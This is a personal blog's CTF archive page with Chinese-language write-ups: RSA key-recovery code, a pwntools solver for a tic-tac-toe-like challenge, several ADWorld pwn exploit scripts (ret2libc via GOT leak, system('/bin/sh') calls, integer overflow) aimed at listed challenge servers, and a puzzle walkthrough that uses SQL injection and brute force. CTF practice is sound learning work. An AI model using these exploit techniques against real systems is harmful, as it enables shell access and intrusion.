分类目录归档:CTF

CTF Crypto RSA

已知质数p,q,公钥(指数)e,求私钥d。
利用欧拉定理解私钥d,利用扩展欧几里得求逆元。
python代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
def CPPDiv(a,b):
    return int(a/b)

def CPPMod(a,b):
    quotient = CPPDiv(a,b)
    return a-b*quotient

def ExGCD(a,b,x,y): # Return GCD,x,y
    if b==0: return a, 1, 0
    d, y, x = ExGCD(b, CPPMod(a,b), y ,x)
    y -= CPPDiv(a,b)*x
    return d, x, y

def ExGCD_Cal(a,b):
    return ExGCD(abs(a),abs(b),0,0)[1:]

def QuickPow(a,b,MOD):
    if b==0: return 1
    result = QuickPow(a,b//2,MOD) % MOD
    result *= result
    if b&1==1: result *= a
    result %= MOD
    return result

def solveRSAd(n,phi,e):
    u, v = ExGCD_Cal(e, phi)
    if v>0:
        u += phi
        v = e-v
    return u

def Main():
    p = int(input("Prime p:"))
    q = int(input("Prime q:"))
    phi = (p-1)*(q-1)
    n = p * q
    print("Mod N: %d" % n)
    e = int(input("Public Key e:"))
    d = solveRSAd(n, phi, e)
    print("Private Key d: %s" % d)

if __name__ == '__main__':
    Main()

已知质数p,q,公钥(指数)e,和密文c,解出私钥d和明文m。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
def CPPDiv(a,b):
    return int(a/b)

def CPPMod(a,b):
    quotient = CPPDiv(a,b)
    return a-b*quotient

def ExGCD(a,b,x,y): # Return GCD,x,y
    if b==0: return a, 1, 0
    d, y, x = ExGCD(b, CPPMod(a,b), y ,x)
    y -= CPPDiv(a,b)*x
    return d, x, y

def ExGCD_Cal(a,b):
    return ExGCD(abs(a),abs(b),0,0)[1:]

def QuickPow(a,b,MOD):
    if b==0: return 1
    result = QuickPow(a,b//2,MOD) % MOD
    result *= result
    if b&1==1: result *= a
    result %= MOD
    return result

def solveRSAd(n,phi,e):
    u, v = ExGCD_Cal(e, phi)
    if v>0:
        u += phi
        v = e-v
    return u

def Main():
    p = int(input("Prime p:"))
    q = int(input("Prime q:"))
    phi = (p-1)*(q-1)
    n = p * q
    print("Mod N: %d" % n)
    e = int(input("Public Key e:"))
    d = solveRSAd(n, phi, e)
    print("Private Key d: %s" % d)
    c = int(input("Cipher c:"))
    m = pow(c,d,n)
    print("Plain m: %s" % str(hex(m)))
   

if __name__ == '__main__':
    Main()

参考链接:

数论代码总结

洛谷 同余方程


https://www.freebuf.com/sectool/163781.html
还有一本数论概论:)

BJD CTF Programming notakto_1

不知名CTF比赛的不知名题目,类井字棋,要写程序判断。
写了两个程序:如下:
C++有漏洞,够用就行:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
#include<iostream>
#include<algorithm>
using namespace std;
int process[10] = { 4 };
bool visited[10];
inline int cal(int x, int y) {
    return x * 3 + y;
}
bool& vis(int x, int y) {
    return visited[cal(x, y)];
}
bool check(int x, int y) {
    bool flag = false;
    flag |= vis(0, y) & vis(1, y) & vis(2, y);
    flag |= vis(x, 0) & vis(x, 1) & vis(x, 2);
    if (x == y)flag |= vis(0, 0) & vis(1, 1) & vis(2, 2);
    if (x + y == 2)flag |= vis(0, 2) & vis(1, 1) & vis(2, 0);
    return flag;
}
void print(int n) {
    for (int i = 0; i <= n; i++) {
        cout << process[i];
    }
    cout << endl;
}
void dfs(int step) {
    bool flag = true;
    for (int i = 0; i < 9; i++) {
        if (visited[i])continue;
        visited[i] = true;
        process[step] = i;
        if (check(i / 3, i % 3) == 0) {
            dfs(step + 1);
            flag = false;
        }
        visited[i] = false;
    }
    if (flag&&step%2==1)print(step);
}
int main() {
    visited[4] = true;
    dfs(1);
}

python连带着往外发socket麻烦得很:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
from pwn import *
sock = remote("222.186.56.247",8122)
wordList = []
currentWord = ""

def findNewWord():
    global currentWord,wordList
    for elem in wordList:
        if elem[0:len(currentWord)]==currentWord:
            return elem
    raise Exception("Error:Word Not found!")

def loadDic():
    global wordList
    with open("situation.txt","r") as f:
        wordList = f.readlines()
   
def getIntfromSock(sock):
    sock.recvuntil("My move: ")
    x = sock.recv(1)
    if x==b' ': x = sock.recv(1)
    return int(x)

def payGame(i):
    global currentWord,wordList,sock
    print("the ith:",i)
    currentWord=""
    while len(currentWord) < 5:
        backupWord = findNewWord()
        print("Send:",backupWord[len(currentWord)])
        sock.sendline(str(backupWord[len(currentWord)]))
        currentWord += backupWord[len(currentWord)]
        if len(currentWord)==5:
            print("break")
            break
        currentWord += str(getIntfromSock(sock))
        print("currentWord",currentWord)
    sock.recvuntil("win!")

loadDic()
for i in range(150):
    payGame(i)
sock.interactive()

代码链接:notakto

ADWorld Pwn level3

完全看着WriteUp写的,里面说了个PLT和GOT表,这个概念之前接触过一点,但没怎么用过。模仿人家代码的时候也没怎么细想。先敲一遍将来就理解深刻了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
from pwn import *
p = remote("111.198.29.45",33161)
elf = ELF("./level3")
libc = ELF("./libc_32.so.6")
write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr=elf.sym['main']
p.recvuntil(":\n")
payload=b'0'*0x88+p32(0)+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(4)
p.sendline(payload)
write_got_addr=u32(p.recv())
print(hex(write_got_addr))
libc_base=write_got_addr-libc.sym['write']
print(hex(libc_base))
system_addr=libc_base+libc.sym['system']
print(hex(system_addr))
binshaddr=libc_base+0x15902B
print(hex(binshaddr))
payload2=b'0'*0x88+p32(0)+p32(system_addr)+p32(0)+p32(binshaddr)
p.recvuntil(":\n")
p.sendline(payload2)
p.interactive()

ADWorld Pwn cgpwn2

好像会点了^v^

1
2
3
4
5
6
7
8
9
from pwn import *
p = remote("111.198.29.45",55602)
p.sendlineafter("your name","/bin/sh")
strAddr=0x0804A080
sysAddr=0x08048420
payload=b'0'*(0x26+0x4)+p32(sysAddr)+p32(0)+p32(strAddr)
print(len(payload))
p.sendlineafter("here:",payload)
p.interactive()

ADWorld Pwn int_overflow

整数溢出的题目,之前从没做过,所以看了WriteUp。

1
2
3
4
5
6
7
8
9
from pwn import *
p = remote("111.198.29.45",56345)
p.sendlineafter("Your choice:","1")
p.sendlineafter("username:","123")
flagAddr=0x0804868B
payload=b'0'*(0x14+0x4)+p32(flagAddr)+b'0'*(0x105-0x8-0x14)
print(len(payload))
p.sendlineafter("passwd:",payload)
p.interactive()

ADWorld Pwn guess_num

经Imagin大佬入门指点开始没事干闲的做点PWN玩,看了两个栈溢出的例子Writeup体验了一下,这个是第三个题目,自己做了一下,做出来了。
栈溢出覆盖随机数种子,写一个C程序用gcc编译一下能生成一模一样的随机数。
Pwn代码如下

1
2
3
4
5
from pwn import *
p = remote("111.198.29.45",44610)
payload=bytearray('0'*0x24,"utf-8")
p.sendline(payload)
p.interactive()

2017红包解析

红包网址:http://rb.renjikai.website/2017-redbag1/

解析rb1:老套路,审查元素form的Hidden,year=2017提交即可。
出现decode_base64(‘u606du559cu4f60u4eecu901au8fc7u0072u0062u0031u7ea2u5305’)
base64解码得
刚刚才发现我出错了,本来应该是base64解码的,我忘了给字符串加Base64了……
直接对u606du559cu4f60u4eecu901au8fc7u0072u0062u0031u7ea2u5305进行unicode转中文(网上各类小工具,用Notepad把u替换\u即可)得到“恭喜你们通过rb1红包”,这个是支付宝中文口令。
查看rb1源代码可以发现注释small hint for rb2:sql injection,明确rb2目标sql注入。

解析rb2:sql注入:username和password都输入即可,出支付宝红包口令translate_to_chinese(“congratulation”)+”C2AEE99934″,translate_to_chinese(“congratulation”)是“恭喜”+”C2AEE99934″=“恭喜C2AEE99934″即为支付宝中文红包口令。

解析rb3:新套路,暴力破解。
查看html源码,有注释guess is a 4-digit postive number,可以编写脚本从1000尝试到9999自动Post即可,最后发现这个数是5716,输出数字口令88281030。

目前该页面已经移动到http://rb.renjikai.website/2017-redbag1/(早已下线),感兴趣的同学可以稍后尝试,源代码稍后发布
源代码下载地址:http://bucket.renjikai.com/2017-redbag1.zip